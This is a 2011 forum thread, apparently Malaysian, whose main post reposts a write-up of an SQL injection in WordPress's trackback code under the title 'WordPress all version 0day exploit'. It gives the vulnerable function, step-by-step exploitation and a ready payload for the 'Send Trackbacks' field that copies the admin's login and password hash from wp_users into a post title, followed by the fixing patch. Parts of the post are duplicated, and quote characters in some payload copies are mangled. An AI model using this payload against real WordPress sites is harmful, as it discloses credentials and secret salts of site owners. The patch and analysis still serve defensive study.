wackwall Admin
Zodiac : Chinese zodiac : Posts : 159 Points : 5336 Reputation : 2 Join date : 10/12/2010 Age : 42 Location : Sarawak
| Subject: WordPress all version 0day exploit Sat Feb 12, 2011 9:14 pm | |
| Description: SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query. Access Vector: Network Attack Complexity: Medium Authentication: Single Instance Confidentiality Impact: Partial Integrity Impact: None Availability Impact: None UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this article. The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that comes from the user, allowing a remote user with publish_posts and edit_published_posts capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any information stored in the WordPress database. - Code:
-
function do_trackbacks($post_id) { global $wpdb;
$post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) ); $to_ping = get_to_ping($post_id); $pinged = get_pung($post_id); if ( empty($to_ping) ) { $wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) ); return; }
if ( empty($post->post_excerpt) ) $excerpt = apply_filters('the_content', $post->post_content); else $excerpt = apply_filters('the_excerpt', $post->post_excerpt); $excerpt = str_replace(']]>', ']]>', $excerpt); $excerpt = wp_html_excerpt($excerpt, 252) . '...';
$post_title = apply_filters('the_title', $post->post_title); $post_title = strip_tags($post_title);
if ( $to_ping ) { foreach ( (array) $to_ping as $tb_ping ) { $tb_ping = trim($tb_ping); if ( !in_array($tb_ping, $pinged) ) { trackback($tb_ping, $post_title, $excerpt, $post_id); $pinged[] = $tb_ping; } else { $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) ); } } } }
The $tb_ping variable is passed to the query in line 1657 unescaped. Exploitation. The logged in user must have publish_posts and edit_published_posts capabilities (this corresponds to the Author role). Below is an example of how this vulnerability can be exploited (images below are clickable): First, the user creates a new post (title/content does not matter); text to put into the “Send Trackbacks” field is - Code:
-
AAA’,”)),post_title=(select/**/concat(user_login,’|’,user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’ and publishes it. He needs to wait a bit — for wp-cron.php to process the trackback. The get_to_ping() function says that this trackback is to be processed: - Code:
-
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' Then the user goes back and edits the post: Now the user duplicates the text in the “Send Trackbacks” field and updates the post - Code:
-
AAA’,”)),post_title=(select/**/concat(user_login,’|’,user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’ AAA’,”)),post_title=(select/**/concat(user_login,’|’,user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’ The get_to_ping() function says that these trackbacks are to be processed: - Code:
-
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
Query logging shows that WordPress executes this query (reformatted for the sake of readbility): UPDATE wp_posts SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'', '')) WHERE ID = 11 After that when the user refreshes the page (he may need to wait a bit for wp-cron.php to complete), he will see something like this: Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed. The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch. Patch: below is the patch against WordPress 3.1 rev. 16609 that fixes the vulnerability: Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed. The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch. Patch: below is the patch against WordPress 3.1 rev. 16609 that fixes the vulnerability: - Code:
-
Index: wp-includes/comment.php =================================================================== --- wp-includes/comment.php (revision 16609) +++ wp-includes/comment.php (working copy) @@ -1723,7 +1723,7 @@ trackback($tb_ping, $post_title, $excerpt, $post_id); $pinged[] = $tb_ping; } else { - $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) ); + $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, %s, '')) WHERE ID = %d", $tb_ping, $post_id) ); } } }
| |
|
masokis New User
Posts : 10 Points : 4829 Reputation : 0 Join date : 04/03/2011 Location : http://www.masokis.com
| Subject: Re: WordPress all version 0day exploit Mon Mar 07, 2011 9:43 pm | |
| kalau dah berjaya login as admin/author.. kenapa nak exploit mcmni lagi. kalau xde access/author admin xbleh gunalah kan? | |
|
wackwall Admin
Zodiac : Chinese zodiac : Posts : 159 Points : 5336 Reputation : 2 Join date : 10/12/2010 Age : 42 Location : Sarawak
| Subject: Re: WordPress all version 0day exploit Tue Mar 08, 2011 7:49 am | |
| | |
|
Sponsored content
| Subject: Re: WordPress all version 0day exploit | |
| |
|